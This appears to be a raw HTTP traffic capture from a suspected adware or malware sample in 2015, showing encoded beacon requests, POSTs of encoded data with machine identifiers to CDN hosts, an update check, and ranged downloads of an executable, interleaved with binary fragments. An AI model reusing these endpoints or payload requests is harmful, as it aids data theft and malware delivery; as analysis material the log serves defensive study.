....&.9V..D.........]wu.h..I.!4.E.To.&.H@2]..3........{ &c.e.\Q..9T.K.
.[...jy....V[..j..`....c..%.:....D..sP......d..7xv../..Hn.......F.L.9.
......&....[. z...p.../Y.....L......)L.C.\B.L(.?.D..So.;.7.._M...FJ...
wj...RiT..K..A...x......},[email protected] .....!&.Lq7..PS...`..
...%..O.5_mITP.......?.x6Xh\.n~a.w\.&.mo......[.(&j.....,1~....H......
.nU.].....U..h...o}.F(....((wj....\m...]t".\.]@..].#.!....Tw..TO../.V 
o.......L.;.VAaH.<...u...=H....`.....Ox8x:........A.$...-...'t.....
#...O...,..Eb.....]..qd...yOv.=d'f.....J.V.....D....2Y....es..by..j.(.
.X.;z.`$Y.}..M&=...jNL.}{a......'.........c..R.....'...58..\^Y....e@(.
S. t:.................Ao..f...7P..]?..-{......m. )h.A.<....r.......
. ..%..~..5.v. .LT..".;[email protected]..\[email protected]..%
...h.....}.,.0<K.FI.&.....X..qc.f%.Y.......l%/U....D.8....$.X...H=.
.?.G.`U.0U.....p].X.B.h:..F3.N.ODK......P,.%......?.~...:.Ll.%,q....8x
....;j I/..,.U......|...luh1S.._....q`G.Z y....%........d........^
<<< skipped >>>

GET /6765.ashx?e=j7YMo/n29XMVCZIctrluXtaZD9ii2/f24oNkMudt8cymy6t0 u4xzc/4PvVcYKfqUA7dl9owwhIeI9VTThLJ3QoyTnjIGwsDHqw5vZq5l38VizWrzz2Aai1pxIHn7ibkOWufSVBCsQTuVqOEbeDQPM9QwHA7xSPxo UCJoj6Xc7yw2dOqRz0VTJIBlhaXll/jgb6v7cXpPsHbyM38hHidRTXymTQoAnR8SJA d bWCF/Jve3H wkbF gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBcgN Ty9FJY0O7fFnRtDe1osnNJHL5mEh8= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:32 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=eISsn0A7mAaebxLgvS5H7tJUmOkut48zq7Usd8RgZwTCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9Ky1lAgh0GvRJFCsfbigoJtBcxpwjbkEKEepEygzZ5HCHBgq eNMUDOF5rLdz0lnXn5pynfaNYH8L/fV9OCtHXZfPuxf9BWge8Sjgb6v7cXpPvHLK4k0AiLSfEiQPnfm1ghfyb3tx/sJGxfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXIDfk8vRSWNDu3xZ0bQ3taLJzSRy ZhIf HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:32 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 20 Jun 2015 16:42:32 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

POST /br.ashx?pid={PID}&aid={AID}&ss=0&s=F5GzSMTDK0,99999999-9999-4d88-b7ee-c966777ccc70,&v=2.1.9.476&md5=c8950de27d52cb0b0b3d4ad075f07b1b&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=FF02F80A-6BB2-428A-AD11-E4095E03665B HTTP/1.0

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

Host: d23ocewf5ttxmu.cloudfront.net

Content-Length: 2290

Connection: Keep-Alive

Pragma: no-cache

d=noFFkfVcv3km7WveOKPFpAF6B0O0ro9PfzuBRNmpu2QhFfZGC2VZ7Z7PIArpQ9fOOsnFP6dVoKPBxxs7kP4nkxvBMHCET2WFXwyIwwc4vr4VEY71eal2LgEW/FKJpfh5wbK7PIMLAzBCHyZe78a65oB4QjNgbulgyc9TzY79jF0JhdU QWyrUC7Vp6l4gg4gYLR /PVtgaNPeOG90m SalUSlanEN4JJMo9t7MorEcwh8zmIXF nnEa8rIlQU4ejAgCMq8cW5e482q9pVX3rtDdrNul1As bSm/A4t57/Peh0XunaydVwAeG2t62Oskx22BEvreZq gXuR/nU8bI8k2azF95bkEYrd2etW17EG2Z5ETw5rwKUu9hx0bKdHLT0odsVRCKnPKayyHyKOCzuuENsbpG7Bi7qL9Sxz3KyK1seCcogAMybYypjwpij5wRTmRQAlVjpC555qUPpjP75O8f0SVOl xnR07kQHmM7RJfR piXyOcZSAzKlY7zaZc/Y6FbgV9VoOQcYbWWPMvu5y1BfdiHfkiGf8yvrK/T2PKzKBjR4Z08NqkMXebhGTo Wc/WmXzoEoJumbxwOLg4dSUiGlv33R6IVAqpfstpJTEFOHXrEO4q6jyikKEr2vITf9nliSVwb ifFTUtbbFmQN6opkCsqCPAQ3vQ2Rk3CeRDpRQZrHU4ufPJ2/hKdjqRhd/ UDZENAkGGnGn4qjdnvJzEgmmAG3d 3vpuoFVTvLBG15w5n tGx1g8IFYlLY2fGVrunhy7JyWQWDjdeLmZbfGe63ujvFN4/IdcjMz5aWM7A3gpn1IOd5nn4gWD0 JJPSO1dB9vzcka6Jq28m2wOAzXM3S7L BVh4p01CTtiEKHmGvoEYk3moyP3KCXA6wT3vB6AoZft7IVC7zNTFNMVTEYOwQOSqfkmZbzHMQeDNg2N0OTbv8WzZ1as1GUq0uIE68br6Nnh4oV2R8Hq188baTUam6DLMOvQ6CnoRwGNFsJE11oxcC0//tlC1PC5SIQZcK8NUHdcsiQbvw fFLLI9sTbBAK4di5M6t7rjey7C/baKm5RC29W
HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private,no-cache, no-store

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:43:02 GMT

X-Cache: Miss from cloudfront

Via: 1.1 59230305fa4e8eba32de075786d44476.cloudfront.net (CloudFront)

X-Amz-Cf-Id: BHb-CxQ86ml8X3slOzG8CXjZhggNdTRdnckKHZqf5hYYGJf4UHaOMw==

GET /wu.ashx?dsid=1&s=F5GzSMTDK0,99999999-9999-4d88-b7ee-c966777ccc70,&v=2.1.9.476&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&usetmd5=&bmd5=&hpp=1&spp=1&ntp=1&ubrand=sc HTTP/1.0

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

Host: pwvz71qp-ur1xo6pn.netdna-ssl.com

Pragma: no-cache

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:56 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 1956

Connection: close

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
nsd1k/d8Rgki7WO0x3vmVqmF52tvRK9DY3SBNWGpNKuPeCaTUE5yD1YZUYv2h4eQMu0Qj1
pEHxHfsJFNR5UQBFlQSAUBRxydwHSQR2e91qwuDiku13egganx4XZYzDDf/uK77YgjbZZk
XH/kIorrwEnQBmbc2NPGDRYX5yv0yVYeh14FMmsxLnbuj4Ptlnvg rdRXCWYa4MjigwbOo
d79SwLaoQSP3GMKkKhcu3Pdqmn/oOhpYnpBAC06W11R5J58Dxs6cxUOg85IaD8VKKBNxLd
70pIar0ptOn3P0rdIpyMmnAqJe5FjLK LsHdNFG/Rvwz5IFnqbfM4PhK15F/OIpbE1MR76
cgflrgTNJrLGkO9u X2UAWXyRvEFPHR7kBqiST9RxhPBH7f0 R1zzi4swKKsIIf9yKdVaC
OsmY e75tWv1IFiK4kax2OVLju7zTVTk0zvEC4ReQLQVlX HutqebqZk7u2M//jAw/E3WZ
07QhZYND1nQ9XYKOdshizNKYz5ks2QsHf6m 85gyN4TBAghPkZBAR/oEmlDzQlOoQ1BgJu
08DePE/gknewowmwlc3YqE9OXKWOtYs5rAIp8fwS0e6R9FSkvgtEQInGDxYSD0NaQMsXa0
4NNgQB6v/XtGBcK/lMyw9QqW8k57JdeHxKgIV7bnwP2ZycsxvBQY657V Q8JnDPbCEf4jA
BLPoEBrhu7F2BmcdBDxx74oCIxh0COxcyuEiIXm7iJ0H3i6eMIxxN/W2qnKBF4S6iNabBC
jrZAscXq23vxJhWTaw1M5lw9FHrbcbZzVFjIVqxxwvpiu0NhO Nb9CJg016Mwo17Ahsvyy
b35h0qiZQ0yTDUrWXf1UPhrhBbeyAmHs5WtGtQ68lfO2kp7uaWbh/Wh0dD1TD6Bo3N/mfD
4Kx21eUbnZ9Mq UsVOiHZ9UfEsqNBr2yEAQtASjl k7uMcQhlNsCB1VSTDMQQvzWIALfp0
7tnbQraiNEXG038JnCG2/Er9M/dso43tIGESeFg5PKp4Ev2WYdmIh5ceRrChcFEbjADtmw
plNIyZCdIN39/DXUpjvYUuSgmbrI3R1WpgbyAnCTpH6S 0fZkwUBpsyq14APB7O XEeEBE
Z474gUmMHHTLgZxoFyTMaF0tTVwIgGq7OViV3/3ntvX5IxH yyuFk3WCAQhS cd9Ekqndv
J3JhZ6TLKz3p14qnYGU2Piq7ORo0R7y9BTcQaT7Rw9C lP201UYjcMiUFAYs8uzu3HqTqO
hAdc3jFMW9HXVLKdm7k6kWvyWRRDNPU7NQ3JhnY21Q9XQ5fp83QKe/JsIl dmhopoVgR82
dlL1mS1XfEyg0s2RXupUokug0d0hl54m7I5XcJlb20miHSEnAdKRr5NK2peUrk3rL4Fh4i
OfALvHfKoK5zFcT/2LIDtzV4Ita6rCB4lkCS5mHrflwxFmc9jdXJNsqfhfDArL92BH38Wd
M4PGmcZnKN7fr1msduqy46t/WT0Si/hqG0xrURj/bgomq3gW0Y9ZhpKxmO CXEQ/AS
<<< skipped >>>

GET /21873.ashx?e=6SSQJDW2871SGyd5XovakSbVQUa08Zx3/lCDRYG1zoqOcTxdoMXoDozpbjeDHyvNqJDnlUORNKJFgAYD7IlOOXldwU aft4vNrWPU3fEKQz2l707m4VLpE/IV6ft2BimRteg227sOdIp0kvsY0HPnNlsH9PMWVgeYCpHZc9ZUaFcK7Xqcv9IBwTxIUcsgQ wqxRHf53TbihqRNE9idkIQG1DQScALkX7cuxsONQz6P9AjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3QoyTnjIGwsDHqw5vZq5l38VizWrzz2AanV iafD0x4/ HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:24 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 20 Jun 2015 16:42:24 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

POST /br.ashx?pid={PID}&aid={AID}&bur=1&ss=0&s=F5GzSMTDK0,99999999-9999-4d88-b7ee-c966777ccc70,&v=2.1.9.476&md5=ce87265e3044c0bd933e5cc45732ef2a&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=FF02F80A-6BB2-428A-AD11-E4095E03665B HTTP/1.0

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

Host: d23ocewf5ttxmu.cloudfront.net

Content-Length: 2302

Connection: Keep-Alive

Pragma: no-cache

d=noFdkUddv3Ym7WcoDHJY4EVHWunmIcaG5dy2cTjqHezI1l9wIxhA8Zx7KKwdk2DjNLUB2qpINXMd7 I /yRpVDN2Cf75C7sVC243vviCdb9kGlUIWci51gDv0eH2vAB4pB24IqNIX8JxqAr3hViO/63bAJxAxZsv7fED0Bp3VDuBI0ETCbmCtqCaETXIY3THTC2pIH2IZpfRF9TvSnAnhQ9PfOiRur4wBeGsjSMvgM/scilXk4yT8aXvpFWCRG7Tq9khP8CQ8sRBxO09xD/v384O6v dPRb64ItYQUJnMU MQ SWM3v748OIu cKWgvgwDeVj/qnd 3k4kpFHQ1bh3NxS4BHXwDNpD58nHQi  H XWbQ8L6DyUqLcczlMANgWYmkHQ/ciE2WVm403XyziBOvwHY0HAljzC0qyNO9VRqVeJdsLjEDsD8o3us8nbOnBqZOfw2g/ejBsDgR6pmZC0NZuPw9qyrAfrGE6Nv6v aaBcdif8WTpF3NCcwLylyvJ1k9PZQbNNnVAIhOo392X3G/1zDn8ipNdL3DyhoAulg0g3g9dpmkta0ZrsWBLSk1AWgQFApZKuEibhiPMuTXiR8 Wlr9mIpV1BVBhPqHp5spJ5AhQVr e/QABTONkoa0qzPKiUyMb9 FDHUaMSl2PogCkZLhhtIwc7X3dF6LfAw5tH4IM5XI6OoKpRuP B9QXTHWZKbriPKcf7m3 4UC1s9SsIkr666RrOj1Uy/LlUsWr/Bub9X47oqGVCo9juW244GbS4H1ylVVww9WZtYfHuDYloWesIAAbs w8Vx9z8kG6 LiLXw52HeTu2xQOj9vpZm1L00I1J1bKXiXk0kH5m7UkH9 uGwdCkyAr6 ODGXhqS1zsvuYOGxWE3FiQAAkrkk0By2qestWsJyf3Bvvc7LFTueaIc7lo1yFQO5jTUx6ezQnNueYyCOvKzWphu1RWG2R/LTZmf46GvYUb3to8zbaBRkeAWsHFWPvuQiubeAndL2jIo60WfETZve2arog3hn2JF7DY6XNwpEX6YKD8QoXEtIhn4mb4ks5PnRm1VlmZadAO
HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private,no-cache, no-store

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:43:06 GMT

X-Cache: Miss from cloudfront

Via: 1.1 5f32e0f17e78c0bfe70226dd05074c92.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Kkn5amYd3mPXzsjSgT5ZNTBl4HGITZJ-q90vFJR-qEJ3yMiZPNb_

GET /smw9476dp.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 10:08:48 GMT

Content-Range: bytes 250000-499999/3973864

X-Cache: Hit from cloudfront

Via: 1.1 c0d8851778177ac6bc88a130d5510155.cloudfront.net (CloudFront)

X-Amz-Cf-Id: crtj9xRqYyQY-HxjHSwUnfa2flhDFENXnKDm3lfU2KY4Vq3MQO-ioA==
....qS..4..e....7..*.`5....X..JW..1..Y.....~oMH.h^I..4.D... SqS.......
...'.6..../..w'.~...g.Z..k9(FT.D*\..9..v.wUwddjAY....,.5.......<..6
o.tS.....1n........%......v.).}..}.q.k.7H...V.D..HhD..t.e..NZ.yD."..^.
s}....y.S......J/\5(.....E...1B8O.7g'...G#...d.....b....f...\...6.....
.-..CU.qPz.C.......D...B}n]6.w}....W.E..h<...s .S.exKL.......$.v7..
|....m.....8.......f[n.[.y...t.(2......7...;^9.Q....3S.Z..........r...
.|.;,...O 7`-O.t......7.-3M.94n.Ry...A.U%......`.....`(..q..i...69as^.
$J.5.T.............gXy$zV.0..e.~.,B.hN.k...<[email protected]...@....
...t.2....U...N?...~./...K.Z.....j.1.5c..R}@J....).:......^.s......D..
....P;y...`.L..y~r...x..V.f....Xi..J..-Fp...1...............k'y.~..m1.
...V..E._.L.}c....0,.....V.K5. [email protected]?o......x.A....
h.pV.I.".T....bV.?...Rs.E].H.....`....sr.9 Z'.z.=. .d.`.......0....[..
P..T.7V..ROo.j...?.....>.F.D...v.?....~Qu.FI..8.ej.m~..."E..Z......
..ik...ssj..`.'.F..j..........8...Ad...(nn....(.*.F..s.-...4M.......$F
..*..H....5'/.=....pAn..J..B.A..l)..[......h..s7j..4.\y....V...F...2cf
....f'..c..\...,... `.....6}.jB.....h...^!...>......D.V..J...G....i
<...3..G..H.*.....n.....X.8f..Cw....Y.UV\..,NUV0[............g.1...
.: .].....}g...... ..........AZv ......P..y.s.Uca.F [email protected].{.....
K.p.S.G.......O.jy.ej..A....Jj...,m.4..,Q8J..q..H..L...`..X./......b`.
_L.5:.f.4Dz.:>. ..#X...e....O..o...^.\..........g-...........2.....
q..j.......|.b(6._...&O.......h..~.V..K................D...~.u..t.Y5.^
]%/...0.X......A.vp4...uJ..6.h.u..>..2....6Q...A.1R......H....U
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 10:08:48 GMT

Content-Range: bytes 500000-749999/3973864

X-Cache: Hit from cloudfront

Via: 1.1 c0d8851778177ac6bc88a130d5510155.cloudfront.net (CloudFront)

X-Amz-Cf-Id: W6zaOteZHFx38PGBD4E2qHytSF41OQkwFBk-Z2cP9_6ftxwi2IjdYA==
.8.h?./;...g/..t..`......FM!......J.g..3.o.a...."z..{...]...&.......$.
..I6.G..\.9......o.&". .'_zr4....Y...pe[p....Moc..4./M........z..U\j4.
.....{|^.d.7.'....38...9.....$]o...../...Y]........,.X.<=.....5. G.
.1W..j...7...!x.$.~...B.....W.4...\...B*.1.....{..?\.../P(9.........6.
.*...?=*.....64ILl.x....!.._.aF!...*.6..s>.(...Zh.L.*..~NqP(..4!...
.V=.....A..:P./;[email protected].(...._::..Gp.....*.\Mzj...pD.'..`
w...........#EJA.7{............\.9..%W.0.n../Y.......f..g...'A..v.....
....!k....n..X...b....BB.......(7.......tz.....C..L.>....=.........
.$....9..=.Z....wP.Z..|...3.2..@\k..$K.3.m.....T...i~...<...J.&!M{s
[email protected]!.0...........x2I"..........{.yk..9...D0..rR..a=...&0..).(.Ta
Qm....j%..*$A.........& T#....N^>.bn.>.....:U.[B......<S.e..3
`j..3....y..fD.....-Ok.........~........'....,).!..d_.L?S..!|`.....U.L
.......;.q....:.......;.......dy...o7.z{0].hG...^.5..,q....9... ."...g
..Z..zP. .....TH......4.W....*...~H.r. ...6.{.F0u$.u....@r,.....R..L..
...N..p{.c~m...f;..........!~m.........`.X.x.S.5.."..f>g>....8-.
.(R.......}.GK..s.tr...;7.f.s...v.Zk....A...q.'{..dQ.~..W)E....K.|9.ky
....h.@..(...i..J0uJ-.....<.n.QrheL.."L1_k...Z...^O..?..#.N../7.R..
.p.q..U9.b./F..jy$=G... .S..X...e..M...^.....JF.....@D..>.....{...@
..:..v......S....=....t\<vd.N...[[email protected].......(..>.~
q....\Z.}.f7.qTe...|.....=<.u.7. QG....pK.5.C......r.r.......`.j..j
#.,.O...d@tS%Q.N....o#......A.g.3.O0.p}....#...K...=.6.c...T$Gv....!..
.(3.`:g<.B.o.c.-[. .T~`.\..........:%.J&Wd.....N.F.....!?j...M.
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=1000000-1249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:42:23 GMT

Content-Range: bytes 1000000-1249999/3973864

X-Cache: Miss from cloudfront

Via: 1.1 c0d8851778177ac6bc88a130d5510155.cloudfront.net (CloudFront)

X-Amz-Cf-Id: fVwrF9CJB8inp70_Iz-mJdKl-_LeUrbEtouxXz6qUIXkqfcSiO1m4w==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: no-cach
e..Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT..Accept-Ranges: bytes.
.ETag: "7057cf8b2271d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: A
SP.NET..Date: Sat, 20 Jun 2015 16:42:23 GMT..Content-Range: bytes 1000
000-1249999/3973864..X-Cache: Miss from cloudfront..Via: 1.1 c0d885177
8177ac6bc88a130d5510155.cloudfront.net (CloudFront)..X-Amz-Cf-Id: fVwr
F9CJB8inp70_Iz-mJdKl-_LeUrbEtouxXz6qUIXkqfcSiO1m4w==...4... ..]..E....
.X.>$....q....%.N...u.k..p4........!...t..[.R....I.B......X.Hbx.;F.
>v`.H.#.I..;E..L.Q.eN.. ..h=.j.M..sJ...Bq..;a.......L.....f.r.}....
st n..~5rL.5.<Z....Z..).X.R....K.t..E...f.?.....nT.k....2M....X;...
.s.$Q...6Z..R..3.cY.>[email protected]`....T..
..."..;.<..KV.!Y.d.z..(.........hi"[email protected]_)p.:..jk.N..5OWM.
.[......S:'.m$.....'.1Be......X.L.H'>..~...a.tk...VQ.. .K'.(.Fp%..v
..`.:..K.=..hp.5.....M..) .I.K..S.Z.9.x.U7z..M. m..FA....c....yo..b...
1.9#1. H..L....c.b....qj.....>.....C..N.).A$..;...}.I...p.r.H...(.s
]|0...[..(.8r..<^5a...A.....j]...c.... R..$(.f2u..Cx-..`.C.|B$N:.}.
F.`b.d..o0P.r...f..3...............JoM9..$...Y:.......1..............O
6...E O#.K6{.?$-....wU...L....R.L.k.|...5BH8...HK.>....&.`..;.kE.bt
..w ...".OS.|..^.6Oa....o=......$...j\.M..B.O).').....&...4..1.~..X...
....lM...[.....<]. ...o...j.p.w2.U.w...a..!....x.kW..".. .]:.....${
s......qz..........(.h.z........k..}.[.T1...K...X.{(x...y...<..
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:42:23 GMT

Content-Range: bytes 1250000-1499999/3973864

X-Cache: Hit from cloudfront

Via: 1.1 c0d8851778177ac6bc88a130d5510155.cloudfront.net (CloudFront)

X-Amz-Cf-Id: APc0ALO45D-Cx5abmjIPfuzkyi82RMMpwoWAlUBCCauXmu11XXX7Tg==
.C.Q..'....._L."9 ..v..Z.y...1.............'..MZ.a!".. ..B...#.......a
b.~M.i......r.>M..{_.\.v..4R.. T.x$.ai....*.BX6-.....6...)......#..
?.k-....L...KF..............._.......A.H..B...P..[...~..?........;.j=.
t..o?.].v..3...s..^>.FV.8.H.R.&,.}.lb....Ew./....e#[email protected]\.$#...
......q.Cl.WRqP..h..7~c?.x.GS.lp%.!VcG...}]X.C.8Ut......e.C^...u.....W
[email protected]...<xf.6........R3...r_..J. ..y$..a"
....r^.S..i5.\aD.t..Q.gk2%a...F..:.e.`...... ?.v.7{.e..f=.9.h^:^U...q.
.R....I...ueHA.p-.m*.k!.a........y....q.I......./......q.V....f!....M.
j..............L.#.6$./.mu0..5o/....Y..#[email protected]!d..<.\..z.....N._
6...../.e....V......._.Z.5W..H.Eb...w..v.9.A..n.$x.`d.t.r.....t.Zjb...
.,......;..:cd_C.I....sJ..a}.$.z....F.....(C0....7a...... bp7.."j..j..
1....e.q.3.....a.M...k..N.....rO.P..C.>..Q.;.....t..,...U..2ogp....
M{)sod....'8..M3b..... f].d..Ae,......J.~rYX..&xqC........oo.g.Ll>.
)...1Y!...6b...K.X.yk4.].....E4.r>31F.>..'$/o.,[email protected].^
B9... .....cv.UA..).D,....p.'.R..w............8.7....B..w..<.......
.......RA....,UU...|.:.kc...l$...T.F....|..Z.oD....s.).....I..a...2...
5)L.....L.Y.(....U[..xL...Y...]....=q.U.|5~..B.b..u../...#...vxZ...T.c
.....2.L.........{..Z-.s.....X.av..M~F........^.....r..7.M.....;[.....
...k.-*...m....A.7..n.WaSq.....f.ii.w... `....WODp).......].$1.z..y^..
ZY.....I. ....Y..oL/...X~..q........f..8..A...y.~.....`_..!.yb.M.O..a.
T...p..N..N.........h$.$.[j....v............G.:Ya.W........ .'F;Z..3..
..~..W4..A...b%b.....:H..x..h.UY8..X1.....".8.J...l.a...M...5....1
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:42:23 GMT

Content-Range: bytes 1500000-1749999/3973864

X-Cache: Hit from cloudfront

Via: 1.1 c0d8851778177ac6bc88a130d5510155.cloudfront.net (CloudFront)

X-Amz-Cf-Id: wUkZWYLXs-fKPD3w_amyD5MWb8-q5jwWFFDMRC0Ss8wrf4HbxlRXiA==
.[........_T....8rxU....6........b.:...%p`..W.4]......Ev.=D..g..H..#..
.67{..K6.}.6..Q6..z....T.._....1L....s... *...D;..0F..R.x.T.7k....G.Xc
..;.)......^..Wh..]...cU...O....c..[~.Y.1 ........ \...c..[..M..K.....
qx.~...P..j.._]."U..ve&...5.tc..h..r[..."...S.d...D7f:.[.....-..{.....
.....c....R..'D..B......=E......E..L..pI.....=4.........y_.V....{....^
2$...n.......L.c.p.....y[([email protected]...)A0o8.........i=7..
0....peS........2.sx..?L....e {f..r..(gz.w(C...K>....W.....s..!.<
;$..w.MR..%`j...l...Q@K..|".Q............K.....~&.Kj6w...q...G...~.DT4
.E..........~.....Pp Q.U...S.......4...-.V..n...k...X..%g.E.R.].._W..M
..-.k.PX...z.-3..........L`.{V......)...N0.K..A...H"pN]%.......d.`..c-
G}.Z.B....e......M..Z.o....T.y.`..j.t...G......f.j....L.....?{.....-..
...I,....=....G..a.......K4.......P^.%...i..N1..Y..V...,\.W.o....,A...
.[O'...:.e!....J.......#.U......i....}>!!.iJB9j.........8.6VD.*x..H
...>S<...W.>.9.9(2.F.9..]7..)Gx.S...[.......O....U=K......r..
.s7....<6.......7.h.SSJ..V.N....u...).cz..,x6..EX...{p....~`6.v=..M
 "..s.K.=3(U......8..^@.Y....q\..#V8A7<.Qk..,..AK.EE....u...F.~...v
T...T..s.61...zzq.....2.s,.......A1..*&..A....~..8@~$.O}[email protected]
.........2.k.tj.......4.x.......}..d.........N...3....5......]..EG.3~.
.`.=.(.....0&o.L8...Q.../{.$..l...znm.pi*.B....HD...........T.%....j..
.#...}R O..|[email protected]... ............oyW.w..6. .8&Z....B.S.P..=Y.....9...Yu
.c..A'..`......L.>.....Z.5.....I..4... .a..zYB....H.{.z.L.mZ.|..8..
d;[bhI..Y.....j...<X"...W.l.".).y>.......YR..&."XPg.<...c
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 20 Jun 2015 16:42:23 GMT

Content-Range: bytes 1750000-1999999/3973864

X-Cache: Hit from cloudfront

Via: 1.1 c0d8851778177ac6bc88a130d5510155.cloudfront.net (CloudFront)

